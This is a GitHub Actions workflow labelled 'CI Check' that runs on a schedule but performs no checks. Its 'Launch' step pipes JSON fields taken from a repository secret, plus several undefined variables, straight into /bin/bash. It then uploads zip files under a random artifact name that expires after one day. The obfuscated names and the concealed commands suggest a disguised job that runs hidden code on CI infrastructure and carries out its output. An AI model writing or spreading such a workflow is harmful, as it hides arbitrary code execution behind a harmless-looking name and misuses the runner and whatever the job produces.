name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '21 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          wcymh580: ${{ secrets.wcymh580 }}
        run: |
          printf '%s' "$wcymh580" | jq -r .ntd91 | /bin/bash
          printf '%s' "$zbx2590" | jq -r .ly402 | /bin/bash
          echo $sqr824 | jq -r .hmub488 | /bin/bash
          printf '%s' "$rkw363" | jq -r .svqcp321 | /bin/bash
          echo $w7039 | jq -r .mytkx9380 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: vgHOMRog
          path: "*.zip"
          retention-days: 1
